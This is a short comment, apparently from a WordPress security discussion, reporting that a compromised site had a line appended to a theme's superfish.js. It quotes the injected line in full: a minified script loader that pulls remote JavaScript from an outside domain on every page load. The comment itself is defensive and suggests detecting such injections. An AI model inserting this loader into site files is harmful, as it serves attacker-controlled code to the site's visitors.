Slightly off-topic, but an extra issue I found in a recently compromised site was an appended line to ./wp-content/themes/sunrise/js/superfish.js ... but that could be any js file.
;(function(e,l,v,j,f){j=e.createElement(l);f=e.getElementsByTagName(l)[0];j.async=1;j.src=v;f.parentNode.insertBefore(j,f);})(document,'script','https://trademark.iglesiaelarca.com/oBiWuds69dDEOqyLly+6m9I6rJvWbvHKgmU=');
Luckily an add-on for Firefox already blocked the extra request.
Not sure if we want to pull this in to the scope here ... but it might be nice...
Slightly off-topic, but an extra issue I found in a recently compromised site was an appended line to
./wp-content/themes/sunrise/js/superfish.js... but that could be any js file.Luckily an add-on for Firefox already blocked the extra request.
Not sure if we want to pull this in to the scope here ... but it might be nice...